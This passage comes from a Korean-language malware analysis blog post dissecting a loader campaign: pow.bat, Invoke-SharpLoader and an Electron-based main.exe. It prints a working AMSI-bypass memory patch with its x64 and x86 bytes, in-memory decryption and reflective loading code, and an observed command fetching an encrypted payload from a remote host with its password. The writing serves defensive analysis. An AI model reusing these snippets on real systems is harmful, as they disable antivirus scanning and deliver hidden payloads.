될까?",[526,1825,1826,1827,1829,1830,1835],{},"우리는 ",[578,1828,601],{},"는 손대지 않은 채, 감염된 환경에서 ",[567,1831,1832,1834],{},[578,1833,605],{},"를 의도적으로 삭제","했습니다. 아니나 다를까, 다음 사용자 세션 로그인 후 로더가 작동하기 시작했습니다. 떼를 쓰는 게 아니라, 조용히 2단계를 재구축하려는 시도로 말입니다.",[526,1837,1838,1839,1565,1841,1843,1844,1847,1848,1851,1852,646,1854,1857,1858,1860],{},"흥미로워진 지점은 여기였습니다. ",[578,1840,601],{},[578,1842,605],{},"를 직접 재생성하는 대신, 먼저 ",[578,1845,1846],{},"app-64.7z","라는 파일을 드롭했습니다. 표준 ",[567,1849,1850],{},"7-Zip 아카이브","였습니다. 이 아카이브에는 ",[578,1853,605],{},[578,1855,1856],{},"resources",", 그리고 삽입된 모든 로직이 담긴 ",[578,1859,1075],{}," 페이로드를 포함한 전체 Electron 애플리케이션 구조가 들어 있었습니다.",[526,1862,1863,1864,1867],{},"우리는 사실상 ",[567,1865,1866],{},"멀웨어가 소스 패키지를 우리에게 건네도록 강제","한 셈이었습니다.",[526,1869,1870],{},[774,1871],{"alt":1872,"src":1873},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[526,1875,1876],{},"이 7z 아카이브를 손에 넣자, 우리는 원본 로더를 다시 건드리지 않고도 JavaScript 기반 오케스트레이션 로직을 추출하고, 압축을 풀고, 완전히 역분석할 수 있었습니다. 아카이브 구조는 예상한 Electron 앱 레이아웃과 완벽하게 일치했습니다.",[526,1878,1879,1880,1883],{},"이 동작은 공격자가 아카이브를 유연한 페이로드 컨테이너로 사용하는 ",[567,1881,1882],{},"모듈형이고 유지보수 가능한 아키텍처","를 의도적으로 선택했음을 강하게 시사합니다. 또한 로더 바이너리를 재컴파일하지 않고도 페이로드 구성 요소를 교체하거나 업데이트할 수 있게 했습니다.",[526,1885,1886],{},"그리고 우리의 경우에는? 그것이 그들의 체인을 앞지르고, 드롭을 가로채며, 전체 패키지를 손에 넣고 나올 수 있게 해 주었습니다. 마치 제작자가 보지 않는 사이 작업대에서 설계도를 훔치는 것처럼 말입니다.",[526,1888,1889,1890],{},"이렇게 말할 수 있겠습니다. ",[567,1891,1892,1893,646,1896,1899],{},"때로는 최고의 포렌식 도구는 ",[578,1894,1895],{},"del",[578,1897,1898],{},"wait",", 그리고 약간의 호기심입니다.",[557,1901,1903,1904],{"id":1902},"_4-심층-분석-powbat","4. 심층 분석: ",[578,1905,1906],{},"pow.bat",[526,1908,562],{},[526,1910,1911,1912,1915],{},"분석한 멀웨어 캠페인에서 ",[578,1913,1914],{},"Invoke-SharpLoader"," 구성 요소는 맞춤형 메모리 상주 .NET 로더로 작동하며, 고도로 모듈화되고 회피적인 실행 흐름을 보입니다. 이 섹션에서는 그 내부 아키텍처, AMSI 패칭을 통한 분석 방해 전략, 2단계 페이로드를 촉진하는 역할을 해부합니다.",[740,1917,1919],{"id":1918},"_41-바이너리-속성-sharploader-배치-래퍼","4.1 바이너리 속성 – SharpLoader 배치 래퍼",[526,1921,746],{},[526,1923,1924,1925,1927],{},"메모리에서 .NET 페이로드를 로드하기 위해 실행되기 전, 외부 래퍼 ",[578,1926,1906],{},"은 정적 분석 기준으로 다음과 같은 특성을 보입니다:",[1418,1929,1930,1938],{},[1421,1931,1932],{},[1424,1933,1934,1936],{},[1427,1935,1429],{},[1427,1937,1432],{},[1434,1939,1940,1949,1958,1968,1977,1987,1997,2006],{},[1424,1941,1942,1946],{},[1439,1943,1944],{},[567,1945,1443],{},[1439,1947,1948],{},"DOS 배치 파일",[1424,1950,1951,1955],{},[1439,1952,1953],{},[567,1954,1453],{},[1439,1956,1957],{},"스크립트 기반(컴파일된 바이너리가 아님)",[1424,1959,1960,1965],{},[1439,1961,1962],{},[567,1963,1964],{},"파일 크기:",[1439,1966,1967],{},"27.79 KB (28454 바이트)",[1424,1969,1970,1974],{},[1439,1971,1972],{},[567,1973,1473],{},[1439,1975,1976],{},"정상(순수 ASCII 텍스트)",[1424,1978,1979,1984],{},[1439,1980,1981],{},[567,1982,1983],{},"매직:",[1439,1985,1986],{},"DOS batch file, ASCII text",[1424,1988,1989,1994],{},[1439,1990,1991],{},[567,1992,1993],{},"디지털 서명:",[1439,1995,1996],{},"탐지되지 않음",[1424,1998,1999,2003],{},[1439,2000,2001],{},[567,2002,1493],{},[1439,2004,2005],{},"26 / 61(분석 시점 기준)",[1424,2007,2008,2013],{},[1439,2009,2010],{},[567,2011,2012],{},"위협 레이블:",[1439,2014,2015,646,2018,646,2021,646,2023],{},[578,2016,2017],{},"trojan",[578,2019,2020],{},"downloader",[578,2022,1702],{},[578,2024,2025],{},"agentb",[526,2027,2028,2029,2032],{},"단순한 ",[578,2030,2031],{},".bat"," 파일임에도, 이 스크립트는 많은 정적 탐지를 회피하며, 난독화되고 암호화된 페이로드를 다운로드하고 실행하기 위해 PowerShell 같은 LotL(living-off-the-land) 기법에 크게 의존합니다.",[740,2034,2036,2037,2040],{"id":2035},"_42-amsi-우회-기법클래스-gofor4msi","4.2 AMSI 우회 기법(클래스: ",[578,2038,2039],{},"gofor4msi",")",[526,2042,746],{},[526,2044,2045],{},"SharpLoader가 우회하는 첫 번째 방어 메커니즘 중 하나는 AMSI(Anti-Malware Scan Interface)입니다. PowerShell과 Windows Script Host 같은 스크립팅 엔진에 통합되어 의심스러운 동작에 대한 실시간 콘텐츠 스캔을 제공하는 Microsoft 기능입니다. 멀웨어 제작자들은 엔드포인트 보호 시스템의 탐지를 피하기 위해 종종 AMSI 우회를 시도합니다.",[526,2047,2048,2049,2052,2053,2056,2057,2060,2061,2064,2065,2068],{},"SharpLoader에서 AMSI 우회는 ",[578,2050,2051],{},"amsi.dll"," 내 ",[578,2054,2055],{},"AmsiScanBuffer"," 함수에 대한 ",[567,2058,2059],{},"직접적인 메모리 내 패칭","을 통해 구현됩니다. 이 함수는 일반적으로 스크립트 콘텐츠를 분석하고 해당 콘텐츠가 의심스러운지(",[578,2062,2063],{},"AMSI_RESULT_DETECTED",") 안전한지(",[578,2066,2067],{},"AMSI_RESULT_CLEAN",")를 나타내는 결과 코드를 반환하는 역할을 합니다.",[526,2070,2071],{},"관련 메모리 내 패칭 코드는 다음과 같습니다:",[615,2073,2077],{"className":2074,"code":2075,"language":2076,"meta":530,"style":530},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[578,2078,2079,2084,2089,2095],{"__ignoreMap":530},[1706,2080,2081],{"class":1708,"line":1709},[1706,2082,2083],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[1706,2085,2086],{"class":1708,"line":531},[1706,2087,2088],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[1706,2090,2092],{"class":1708,"line":2091},3,[1706,2093,2094],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[1706,2096,2098],{"class":1708,"line":2097},4,[1706,2099,2100],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[526,2102,2103],{},"이 시퀀스는 다음 단계를 수행합니다:",[2105,2106,2107,2117,2128,2138],"ol",{},[633,2108,2109,2112,2113,2116],{},[578,2110,2111],{},"LoadLibrary(\"amsi.dll\")","를 사용해 ",[567,2114,2115],{},"AMSI DLL을 프로세스에 로드","합니다.",[633,2118,2119,609,2122,2124,2125,2116],{},[578,2120,2121],{},"GetProcAddress()",[578,2123,2055],{}," 함수의 ",[567,2126,2127],{},"메모리 주소를 해석",[633,2129,2130,2133,2134,2137],{},[578,2131,2132],{},"VirtualProtect()","를 사용해 해당 주소의 ",[567,2135,2136],{},"메모리 보호를 변경","하여 쓰기 가능하게 만듭니다.",[633,2139,2140,2143,2144,2147],{},[578,2141,2142],{},"Marshal.Copy()","를 사용해 작은 셸코드 패치로 ",[567,2145,2146],{},"함수의 시작 부분을 덮어씁니다",".",[526,2149,2150],{},"64비트 시스템에 적용되는 패치는 다음과 같습니다:",[615,2152,2154],{"className":2074,"code":2153,"language":2076,"meta":530,"style":530},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[578,2155,2156],{"__ignoreMap":530},[1706,2157,2158],{"class":1708,"line":1709},[1706,2159,2153],{},[526,2161,2162],{},"이는 다음 명령어에 해당합니다:",[630,2164,2165,2175],{},[633,2166,2167,2170,2171,2174],{},[578,2168,2169],{},"mov eax, 0x80070057"," → 반환 코드를 Windows 오류 코드 ",[578,2172,2173],{},"E_INVALIDARG","로 설정",[633,2176,2177,2180],{},[578,2178,2179],{},"ret"," → 함수에서 즉시 반환",[526,2182,2183,2184,2186],{},"이는 사실상 ",[578,2185,2055],{},"가 조용히 실패하고 미탐지 결과를 반환하도록 만들어, AMSI 검사를 무력화합니다. 이제 멀웨어는 그렇지 않았다면 안티바이러스 경고를 트리거했을 스크립트나 .NET 코드를 실행할 수 있습니다.",[526,2188,2189],{},"32비트 시스템에서 실행되는 경우 다른 패치가 적용됩니다:",[615,2191,2193],{"className":2074,"code":2192,"language":2076,"meta":530,"style":530},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[578,2194,2195],{"__ignoreMap":530},[1706,2196,2197],{"class":1708,"line":1709},[1706,2198,2192],{},[526,2200,2201],{},"이는 동일한 목표(\"clean\" 결과를 강제하는 것)를 반영하지만, x86 호출 규약에 맞게 조정된 것입니다.",[526,2203,2204,646,2207,646,2210,2213],{},[578,2205,2206],{},"LoadLibrary",[578,2208,2209],{},"GetProcAddress",[578,2211,2212],{},"VirtualProtect"," 같은 원시 P/Invoke 호출을 사용하면 EDR 도구가 모니터링할 수 있는 고수준 API를 호출하지 않고도 이 패칭을 동적으로 수행할 수 있습니다. 이 방법은 간결하고 효과적이며 최소한의 포렌식 아티팩트만 남깁니다.",[526,2215,2216,2217,2220],{},"요약하면, 이 AMSI 우회 기법은 ",[567,2218,2219],{},"안티바이러스 인터페이스에 대한 저수준의 직접적인 메모리 공격","이며, 런타임 중 수 밀리초 내에 수행됩니다. 현대 엔드포인트 방어 시스템에서 행위 모니터링과 메모리 검사가 왜 필수적인지를 보여 주는 강력한 사례입니다.",[740,2222,2224],{"id":2223},"_43-2단계-페이로드-처리","4.3 2단계 페이로드 처리",[526,2226,746],{},[526,2228,2229,2230,2233],{},"AMSI 우회가 완료되면, 로더는 2단계 페이로드를 회수하고 준비하는 작업으로 진행합니다. 이 페이로드는 로더 자체에 삽입되어 있지 않고, ",[578,2231,2232],{},"$location"," 매개변수를 통해 로더가 어떻게 호출되는지에 따라 원격 서버에서 가져오거나 디스크에서 읽습니다.",[526,2235,2236,2237,2240,2241,2112,2244,2247,2248,2251,2252,2255],{},"위치가 ",[578,2238,2239],{},"http","로 시작하면 URL로 해석되고, 로더는 ",[578,2242,2243],{},"Get_Stage2()",[578,2245,2246],{},"HttpWebRequest","를 통해 페이로드를 다운로드합니다. 로컬 경로라면 ",[578,2249,2250],{},"Get_Stage2disk()","가 파일 시스템에서 직접 내용을 읽습니다. 두 경우 모두 예상되는 파일 내용은 ",[567,2253,2254],{},"Base64 인코딩되고, GZip 압축되며, AES 암호화된"," 블롭입니다.",[526,2257,2258,2259,2262],{},"그다음 로더는 전적으로 메모리에서 ",[567,2260,2261],{},"4단계 디코딩 및 복호화 파이프라인","을 수행합니다:",[2105,2264,2265,2271,2281,2291],{},[633,2266,2267,2270],{},[567,2268,2269],{},"Base64 디코딩",": 인코딩된 문자열을 원시 바이트로 변환합니다. 이 단계는 정적 검사 도구로부터 실제 바이너리 콘텐츠를 가리고 단순한 패턴 매칭을 방지하도록 설계되었습니다.",[633,2272,2273,2276,2277,2280],{},[567,2274,2275],{},"GZip 압축 해제",": 디코딩된 바이트는 ",[578,2278,2279],{},"GZipStream","으로 전달되어 페이로드를 압축 해제합니다. 압축은 파일 크기를 줄이고 또 다른 난독화 계층을 추가합니다.",[633,2282,2283,2286,2287,2290],{},[567,2284,2285],{},"AES 복호화",": 압축된 바이트는 CBC 모드에서 AES(Rijndael)를 사용해 복호화됩니다. 키는 사용자가 제공한 암호에서 SHA-256 해싱과 PBKDF2(",[578,2288,2289],{},"Rfc2898DeriveBytes","), 정적 솔트를 결합해 런타임에 파생됩니다.",[633,2292,2293,2296],{},[567,2294,2295],{},"솔트 제거",": 복호화 결과에는 여전히 고정 길이 솔트 접두사(4바이트)가 포함되어 있습니다. 이 바이트들은 수동으로 제거되어 유효한 .NET 어셈블리를 나타내는 깨끗한 바이너리 블롭을 얻습니다.",[526,2298,2299],{},"복호화 파이프라인은 다음과 같이 실행됩니다:",[615,2301,2303],{"className":2074,"code":2302,"language":2076,"meta":530,"style":530},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[578,2304,2305,2310],{"__ignoreMap":530},[1706,2306,2307],{"class":1708,"line":1709},[1706,2308,2309],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[1706,2311,2312],{"class":1708,"line":531},[1706,2313,2314],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[526,2316,2317,2318,2321],{},"여기서 ",[578,2319,2320],{},"AES_Decrypt()","는 Rijndael 알고리즘을 감싸는 맞춤 함수이며, 256비트 키와 128비트 IV(초기화 벡터)로 구성되고, 둘 다 암호에서 파생됩니다.",[526,2323,2324],{},[567,2325,2326],{},"핵심 설계 관찰:",[630,2328,2329,2332,2335],{},[633,2330,2331],{},"PBKDF2와 함께 AES-CBC를 사용하면 암호의 무차별 대입이 사소하지 않게 됩니다.",[633,2333,2334],{},"복호화가 메모리에서 일어나므로, 중간 결과가 디스크에 기록되지 않아 포렌식 아티팩트가 줄어듭니다.",[633,2336,2337],{},"잘못된 암호가 제공되면 복호화가 조용히 실패하거나 유효하지 않은 데이터를 생성하며, 이는 실행 실패나 추적하기 어려운 예외로 이어질 수 있습니다.",[526,2339,2340],{},"요약하면, 이 다단계 페이로드 처리 방식은 시그니처 기반과 휴리스틱 기반 정적 탐지 모두의 문턱을 크게 높입니다. 라이브 실행이나 로더 동작에 대한 심층 검사 없이는, 방어자가 암호와 정확한 디코딩 로직을 함께 알지 못하는 한 삽입된 페이로드를 밝혀내기 어렵습니다.",[740,2342,2344],{"id":2343},"_44-동적-어셈블리-로딩","4.4 동적 어셈블리 로딩",[526,2346,746],{},[526,2348,2349],{},"2단계 페이로드가 성공적으로 복호화되면, 결과 바이트 배열은 유효한 .NET 어셈블리를 나타냅니다. SharpLoader는 이 어셈블리를 디스크에 쓰는 대신(안티바이러스나 EDR 시스템의 흔한 지표), 리플렉션을 사용해 메모리에서 직접 실행합니다:",[615,2351,2353],{"className":2074,"code":2352,"language":2076,"meta":530,"style":530},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[578,2354,2355,2360],{"__ignoreMap":530},[1706,2356,2357],{"class":1708,"line":1709},[1706,2358,2359],{},"Assembly a = Assembly.Load(bin);\n",[1706,2361,2362],{"class":1708,"line":531},[1706,2363,2364],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[526,2366,2367,2368,2371],{},"이 기법은 ",[567,2369,2370],{},"파일리스 실행(fileless execution)"," 이라고 불립니다. 다음과 같은 이유로 매우 회피적입니다:",[630,2373,2374,2377,2380],{},[633,2375,2376],{},"디스크를 건드리지 않아 파일 기반 IOC(침해 지표)를 남기지 않습니다",[633,2378,2379],{},"디스크에 바이너리가 저장되지 않으므로 전통적인 포렌식 수집이 더 어려워집니다",[633,2381,2382],{},"AV 엔진은 종종 파일 스캔에 의존하므로 정적 시그니처 기반 탐지를 회피합니다",[526,2384,2385,1292,2388,2391],{},[578,2386,2387],{},"EntryPoint",[578,2389,2390],{},"static","이 아니면, 로더는 대체 로직을 포함합니다:",[615,2393,2395],{"className":2074,"code":2394,"language":2076,"meta":530,"style":530},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[578,2396,2397,2402,2407,2412,2417,2423],{"__ignoreMap":530},[1706,2398,2399],{"class":1708,"line":1709},[1706,2400,2401],{},"MethodInfo method = a.EntryPoint;\n",[1706,2403,2404],{"class":1708,"line":531},[1706,2405,2406],{},"if (method != null)\n",[1706,2408,2409],{"class":1708,"line":2091},[1706,2410,2411],{},"{\n",[1706,2413,2414],{"class":1708,"line":2097},[1706,2415,2416],{},"    object o = a.CreateInstance(method.Name);\n",[1706,2418,2420],{"class":1708,"line":2419},5,[1706,2421,2422],{},"    method.Invoke(o, null);\n",[1706,2424,2426],{"class":1708,"line":2425},6,[1706,2427,2428],{},"}\n",[526,2430,2431,2432,2435],{},"이는 실행을 위해 인스턴스화된 객체가 필요한 어셈블리(예: 클래스 인스턴스 내부의 ",[578,2433,2434],{},"public int Main()",")와의 호환성을 보장합니다. 이 코드는 클래스의 인스턴스를 동적으로 생성한 다음 진입점 메서드를 호출합니다.",[526,2437,2438],{},"AMSI 우회 및 메모리 내 복호화와 결합되어, 이 메커니즘은 최종 페이로드를 은밀하고 완전히 파일리스한 방식으로 실행에 전달합니다. 현대의 회피적 멀웨어의 특징입니다.",[740,2440,2442],{"id":2441},"_45-명령줄-매개변수-및-유연성","4.5 명령줄 매개변수 및 유연성",[526,2444,746],{},[526,2446,2447,2448,2450],{},"PowerShell 함수 ",[578,2449,1914],{},"는 임의의 .NET 페이로드를 위한 유연한 래퍼로 작동하도록 설계되었습니다. 페이로드 위치와 인수를 모두 동적으로 입력할 수 있게 지원하여, 하나의 로더 인스턴스를 여러 작전이나 캠페인에서 재사용할 수 있습니다.",[526,2452,2453],{},[567,2454,2455],{},"지원되는 매개변수:",[630,2457,2458,2464,2470,2490],{},[633,2459,2460,2463],{},[578,2461,2462],{},"-location","(필수): 2단계 암호화 페이로드에 대한 URL 또는 로컬 파일 경로를 지정합니다.",[633,2465,2466,2469],{},[578,2467,2468],{},"-password","(필수): AES 복호화 키를 파생하는 데 사용됩니다.",[633,2471,2472,646,2475,646,2478,2481,2482,2485,2486,2489],{},[578,2473,2474],{},"-argument",[578,2476,2477],{},"-argument2",[578,2479,2480],{},"-argument3","(선택): 리플렉션을 통해 ",[578,2483,2484],{},".NET"," 어셈블리의 ",[578,2487,2488],{},"Main()"," 메서드로 직접 전달됩니다.",[633,2491,2492,2495],{},[578,2493,2494],{},"-noArgs",": 2단계 페이로드에 어떤 매개변수도 전달하지 않고 실행을 트리거합니다.",[526,2497,2498],{},"내부적으로 인수는 다음과 같이 수집되고 전달됩니다:",[615,2500,2502],{"className":1700,"code":2501,"language":1702,"meta":530,"style":530},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[578,2503,2504,2509],{"__ignoreMap":530},[1706,2505,2506],{"class":1708,"line":1709},[1706,2507,2508],{},"object[] cmd = args.Skip(2).ToArray();\n",[1706,2510,2511],{"class":1708,"line":531},[1706,2512,2513],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[526,2515,2516],{},"이는 .NET 페이로드가 다음과 같은 시그니처를 가질 것으로 예상됨을 의미합니다:",[615,2518,2520],{"className":2074,"code":2519,"language":2076,"meta":530,"style":530},"static void Main(string[] args)\n",[578,2521,2522],{"__ignoreMap":530},[1706,2523,2524],{"class":1708,"line":1709},[1706,2525,2519],{},[526,2527,2528,2529,2531],{},"또는 대체 로직을 통해 매개변수가 없는 ",[578,2530,2488],{}," 변형으로 우아하게 되돌아갑니다. 이 동작은 레드팀이나 멀웨어 제작자가 입력에 따라 다른 작업을 수행할 수 있는 다목적 2단계를 만들 수 있게 합니다. 예를 들어 임플란트 실행, 시스템 정보 수집, C2 통신 개시 등입니다.",[526,2533,2534],{},"이러한 모듈성과 구성 가능성은 고급 멀웨어 프레임워크의 핵심 특징이며, 스크립트 기반 로더가 다운스트림 페이로드를 위한 고도로 적응적인 실행 환경으로 어떻게 작동할 수 있는지를 잘 보여 줍니다.",[740,2536,2538],{"id":2537},"_46-실제-사용-예시","4.6 실제 사용 예시",[526,2540,746],{},[526,2542,2543],{},"실제 캠페인에서 SharpLoader가 어떻게 실행되는지를 보여 주기 위해, 실제로 관찰된 다음 호출을 살펴봅시다:",[615,2545,2547],{"className":1700,"code":2546,"language":1702,"meta":530,"style":530},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[578,2548,2549],{"__ignoreMap":530},[1706,2550,2551],{"class":1708,"line":1709},[1706,2552,2546],{},[526,2554,2555],{},"이 예시는 SharpLoader의 전형적인 사용 사례를 강조합니다:",[630,2557,2558,2572,2584,2594],{},[633,2559,2560,2563,2564,2567,2568,2571],{},[567,2561,2562],{},"Location 인수",": URL은 은폐된 2단계 페이로드 ",[578,2565,2566],{},"calc.enc","를 호스팅하는 원격 서버를 가리킵니다. 이 엔드포인트는 HTTPS 인증서 검증에 흔히 사용되는 정상적으로 보이는 ",[578,2569,2570],{},".well-known"," 디렉터리 아래에 위치하여, URL을 정상 웹 트래픽에 섞이도록 돕습니다.",[633,2573,2574,1001,2577,2579,2580,2583],{},[567,2575,2576],{},"페이로드 특성",[578,2578,2566],{},"는 Base64 인코딩되고, GZip 압축되며, AES 암호화된 ",[567,2581,2582],{},"삼중 난독화 파일","입니다. 이 난독화 파이프라인은 페이로드가 메모리에서 완전히 실행되고 복호화되지 않는 한 대부분의 탐지 메커니즘에 불투명하도록 보장합니다.",[633,2585,2586,2589,2590,2593],{},[567,2587,2588],{},"Password 인수",": 문자열 ",[578,2591,2592],{},"UwUFufu1","은 SHA-256과 PBKDF2를 통해 AES 키를 파생하기 위해 런타임에 사용됩니다. 이 암호가 없으면 페이로드를 복호화할 수 없어, 맥락 없는 오프라인 분석이 거의 불가능합니다.",[633,2595,2596,1001,2599,2601],{},[567,2597,2598],{},"추가 인수 없음",[578,2600,2494],{}," 스위치는 복호화된 .NET 어셈블리에 어떤 명령줄 매개변수도 전달되지 않음을 나타내며, 기본 실행 경로를 트리거합니다.",[526,2603,2604,2605,2608],{},"이 은밀한 호출 체인은 SharpLoader의 핵심 목적을 압축적으로 보여 줍니다. 단순한 PowerShell 구문을 통해 최대한의 난독화와 회피로 ",[567,2606,2607],{},"파일리스하고, 적응적이며, 안전한 페이로드 전달","을 수행하는 것입니다.",[740,2610,2612],{"id":2611},"_47-요약","4.7 요약",[526,2614,746],{},[526,2616,2617,2619],{},[578,2618,1914],{}," 구성은 네이티브 시스템 구성 요소, 리플렉션, 암호화를 활용해 거의 전적으로 메모리에서 작동하는, 고도로 정교하고 회피적인 멀웨어 스테이징 기법을 잘 보여 줍니다.",[526,2621,2622],{},[567,2623,2624],{},"핵심 요점:",[630,2626,2627,2635,2641,2647],{},[633,2628,2629,1001,2632,2634],{},[567,2630,2631],{},"AMSI 우회",[578,2633,2055],{},"의 직접적인 메모리 내 패칭이 탐지 가능한 API를 호출하지 않고 안티바이러스 검사를 비활성화합니다.",[633,2636,2637,2640],{},[567,2638,2639],{},"안전한 페이로드 처리",": 암호화되고 압축된 2단계 페이로드의 회수가 기밀성을 보장하고 여러 회피 계층을 추가합니다.",[633,2642,2643,2646],{},[567,2644,2645],{},"메모리 전용 실행",": 복호화된 페이로드는 디스크에 절대 기록되지 않아, 전통적인 파일 기반 스캐너에 의한 탐지를 거의 불가능하게 만듭니다.",[633,2648,2649,2652],{},[567,2650,2651],{},"모듈형이고 재사용 가능한 아키텍처",": PowerShell 매개변수를 통해 SharpLoader는 다양한 페이로드와 런타임 동작으로 캠페인 전반에 걸쳐 유연하게 재사용될 수 있습니다.",[557,2654,2656,2657,2659],{"id":2655},"_5-심층-분석-mainexe-electron-기반-멀웨어-로더","5. 심층 분석: ",[578,2658,605],{}," – Electron 기반 멀웨어 로더",[526,2661,562],{},[526,2663,2664,2665,2667,2668,2671,2672,2674,2675,2677],{},"리버스 엔지니어링 과정에서, Microsoft Defender for Endpoint가 플래그한 ",[578,2666,605],{},"가 일반적인 바이너리가 아니라 ",[567,2669,2670],{},"Electron 기반 멀웨어 로더","임이 분명해졌습니다. 이것은 ",[578,2673,1846],{},"라는 아카이브 안에 담겨 전달되었으며, ",[578,2676,601],{},"가 런타임에 이를 다운로드하고 추출했습니다. 압축을 풀자, 그 구조와 내용은 전형적인 Electron 애플리케이션과 매우 유사했습니다.",[740,2679,2681],{"id":2680},"_51-electron-구조-인식","5.1 Electron 구조 인식",[526,2683,746],{},[526,2685,2686],{},"추출된 폴더에는 다음과 같은 파일들이 포함되어 있었습니다:",[630,2688,2689,2700,2709,2715],{},[633,2690,2691,646,2694,646,2697],{},[578,2692,2693],{},"chrome_100_percent.pak",[578,2695,2696],{},"v8_context_snapshot.bin",[578,2698,2699],{},"d3dcompiler_47.dll",[633,2701,2702,2705,2706],{},[578,2703,2704],{},"LICENSES.chromium"," 및 ",[578,2707,2708],{},"LICENSES.electron",[633,2710,2711,2712,2714],{},"큰 ",[578,2713,605],{}," 바이너리(~150 MB)",[633,2716,2717,2719,2720,2723,2724,2726],{},[578,2718,1075],{},"와 보조 바이너리 ",[578,2721,2722],{},"elevate.exe","를 담은 ",[578,2725,1856],{}," 폴더",[526,2728,2729],{},[774,2730],{"alt":2731,"src":2732},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[526,2734,2735,2736,2738],{},"이들은 모두 Chromium과 Node.js를 사용해 JavaScript 기반 데스크톱 애플리케이션을 패키징하는 Electron 앱의 강력한 지표입니다. 권한 상승에 흔히 사용되는 서명된 Microsoft 바이너리 ",[578,2737,2722],{},"의 존재는 추가적인 의심을 불러일으켰습니다. 상승된 권한으로 자식 프로세스를 실행하는 데 악용될 수 있기 때문입니다.",[740,2740,2742],{"id":2741},"_52-압축-해제-및-정적-분석심층-분석","5.2 압축 해제 및 정적 분석(심층 분석)",[526,2744,746],{},[526,2746,2747,2749,2750,2752,2753,2755,2756,2758,2759,2762],{},[578,2748,605],{},"를 실행하는 대신, 저는 라이브 동작을 트리거하지 않기 위해 정적 분석 접근을 택했습니다. ",[578,2751,605],{},"가 Electron으로 빌드되었다는 초기 의심은 ",[578,2754,1856],{}," 디렉터리 안에서 ",[578,2757,1075],{}," 파일을 찾아냄으로써 확인되었습니다. Electron 앱에서 이 아카이브는 JavaScript 파일, 구성(",[578,2760,2761],{},"package.json","), 자산 등 모든 핵심 애플리케이션 로직을 담고 있으며, 성능과 난독화를 위해 맞춤 형식으로 패킹됩니다.",[526,2764,2765,2768,2769,2772],{},[578,2766,2767],{},".asar"," 아카이브는 본질적으로 ",[578,2770,2771],{},".zip","과 유사한 읽기 전용 고성능 컨테이너이지만, Electron의 런타임에 최적화되어 있습니다. 암호화되지는 않지만 코드 접근을 난독화하여, 압축을 풀지 않는 한 정적 분석을 더 까다롭게 만듭니다.",[526,2774,2775,2776,2779],{},"압축을 풀기 위해, 저는 npm을 통해 제공되는 공식 ",[578,2777,2778],{},"asar"," 도구를 사용했습니다. 단계는 다음과 같습니다:",[615,2781,2785],{"className":2782,"code":2783,"language":2784,"meta":530,"style":530},"language-bash shiki shiki-themes github-light github-dark","npm install -g asar\nasar extract app.asar extracted_app\n","bash",[578,2786,2787,2804],{"__ignoreMap":530},[1706,2788,2789,2793,2797,2801],{"class":1708,"line":1709},[1706,2790,2792],{"class":2791},"sScJk","npm",[1706,2794,2796],{"class":2795},"sZZnC"," install",[1706,2798,2800],{"class":2799},"sj4cs"," -g",[1706,2802,2803],{"class":2795}," asar\n",[1706,2805,2806,2808,2811,2814],{"class":1708,"line":531},[1706,2807,2778],{"class":2791},[1706,2809,2810],{"class":2795}," extract",[1706,2812,2813],{"class":2795}," app.asar",[1706,2815,2816],{"class":2795}," extracted_app\n",[526,2818,2819,2820,2823],{},"위 명령을 실행하자 콘텐츠가 작업 폴더(",[578,2821,2822],{},"extracted_app/",")로 추출되었고, 실제 JavaScript 애플리케이션 코드가 드러났습니다. 여기에는 다음이 포함되었습니다:",[630,2825,2826,2847,2855],{},[633,2827,2828,646,2831,646,2834,2837,2838,2840,2841,2843,2844,2846],{},[578,2829,2830],{},"jscryter.js",[578,2832,2833],{},"input.js",[578,2835,2836],{},"obf.js",": 이 스크립트들이 멀웨어 로직을 형성합니다. ",[578,2839,2830],{},"는 페이로드 전달을 오케스트레이션하는 것으로 보이고, ",[578,2842,2833],{},"는 구성 상수나 명령 로직을 정의하며, ",[578,2845,2836],{},"는 핵심 페이로드 로직을 담고 있을 가능성이 높은 심하게 난독화된 스크립트입니다.",[633,2848,2849,646,2851,2854],{},[578,2850,2761],{},[578,2852,2853],{},"package-lock.json",": 런타임 환경을 정의합니다",[633,2856,2857,1001,2860,646,2863,646,2866,2869],{},[578,2858,2859],{},"node_modules/",[578,2861,2862],{},"axios",[578,2864,2865],{},"adm-zip",[578,2867,2868],{},"child_process"," 같은 모든 의존성을 포함합니다",[526,2871,2872,2873,2875,2876,2878],{},"압축 해제된 콘텐츠는 실행 없이도 멀웨어 로직에 대한 완전한 가시성을 제공했으며, 이는 안전한 리버스 엔지니어링에 필수적이었습니다. 이 단계는 ",[578,2874,605],{},"가 